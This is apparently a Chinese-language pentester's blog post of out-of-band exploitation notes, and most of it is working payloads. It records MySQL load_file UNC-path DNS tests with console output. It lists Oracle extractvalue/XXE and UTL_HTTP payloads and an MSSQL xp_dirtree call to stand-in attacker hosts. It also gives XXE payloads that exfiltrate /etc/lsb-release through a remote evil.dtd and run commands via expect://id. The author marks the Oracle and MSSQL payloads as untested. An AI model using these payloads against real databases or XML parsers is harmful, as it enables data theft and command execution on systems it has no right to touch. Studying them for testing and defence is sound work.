Out of Band Exploit Tips

MySQL

长时间以来在MySQL中除了注入没有半点长进,最近就连注入也生疏了许多..然后发现有人老在提oob(out of band), 所以在mysql中对此进行一下复现
分别在以下环境下进行
用的同一个payload: select load_file('\\\\test.xxxx.dnslog.com\\a.txt')
在些记录一下,因为MySQL有一个权限为secure_file_priv, 此权限为空(不是NULL)的时候可以利用load_file/into outfile来写文件,如果是权限为NULL则不行。 另外此权限在5.5.53之前为空, 之后为NULL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
os: windows
version:
结论: 成功
+-----------+
| version() |
+-----------+
| 5.5.53 |
+-----------+
1 row in set (0.00 sec)
mysql> show global variables like 'secure_fi%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | |
+------------------+-------+
1 row in set (0.00 sec)
mysql> select load_file('\\\\\testdnsoobmysql.xxx.xxx.xxx\\a.txt');
+-----------------------------------------------------------+
| load_file('\\\\\testdnsoobmysql.xxx.xxx.xxx\\a.txt') |
+-----------------------------------------------------------+
| NULL |
+-----------------------------------------------------------+
1 row in set (21.60 sec)
os: linux
version: 10.1.22-MariaDB
结论: 失败
MariaDB [(none)]> select load_file('\\\\testdns.xxxx.xxx.xxx\\a.txt');
+--------------------------------------------------+
| load_file('\\\\testdns.xxxx.xxx.xxx\\a.txt') |
+--------------------------------------------------+
| NULL |
+--------------------------------------------------+
os: linux
version: 5.1.73
结论: 失败
mysql [(none)]> select load_file('\\\\testdns.xxxx.xxx.xxx\\a.txt');
+--------------------------------------------------+
| load_file('\\\\testdns.xxxx.xxx.xxx\\a.txt') |
+--------------------------------------------------+
| NULL |
+--------------------------------------------------+

不知道是不是我测试办法有问题, 反正在linux下oob attack是失败的。
即oob的应用场景为下windows操作系统/secure_file_priv=’’

另外需要单独记一下, mysql是可以执行系统命令的,但是仅在unix下, 可以在官网看到, 除了系统外,还有一个限制, 即不能在远程登录的情况下执行

ORACLE

目前搜集到的oracle的payload有以下几种(注: 采集自网络, 未经测试, 对正确性不做保证, 对应用场景不做保证):

1
2
3
4
5
6
7
8
#1.
(select extractvalue(xmltype(
'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [
<!ENTITY % glrvh SYSTEM "http://fcvlarzebywms16gggoy7tvo.burpcollaborator.net/">%glrvh;]>'
),'/l') from dual)
#2.
UTL_HTTP.request('http://test.attacker.com/'||(SELECT user FROM DUAL))

MSSQL

同样, 未对此做验证, 只保留记录

1
EXEC master..xp_dirtree '\\test.attacker.com\' --

XML External Entity (XXE)

XML有两种方式用来做oob, 其实更应该是回显的方法, 除此之外, 还有一种xxe执行命令的用法, 但是条件比较苛刻。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#1. poc
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [<!ENTITY %file SYSTEM "http://xxx.xxx.xx.dnslog.com"> %file]>
#如果dnslog里有回显, 那么说明可以请求自己的dtd文件,可以进行下一步利用
#2. exp
#2.1 客户端发送
<!DOCTYPE data [
<!ENTITY % file SYSTEM
"file:///etc/lsb-release">
<!ENTITY % dtd SYSTEM
"http://attacker.com/evil.dtd">
%dtd;
]>
<data>&send;</data>
# 2.2 attacker.com/evil.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?collect=%file;'>">
%all;
#3. 执行命令
# 需要php环境, 且php的expect扩展为true才行
<!DOCUMENT root[
<!ENTITY cmd SYSTEM "expect://id">
]>
<dir>
<file>&cmd;</file>
</dir>

Referer

https://www.acunetix.com/blog/articles/blind-out-of-band-sql-injection-vulnerability-testing-added-acumonitor/
http://releases.portswigger.net/2015/09/1627.html
https://www.exploit-db.com/docs/41273.pdf
https://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf
https://www.acunetix.com/blog/articles/band-xml-external-entity-oob-xxe/

文章目录
  1. 1. MySQL
  2. 2. ORACLE
  3. 3. MSSQL
  4. 4. XML External Entity (XXE)
  5. 5. Referer
|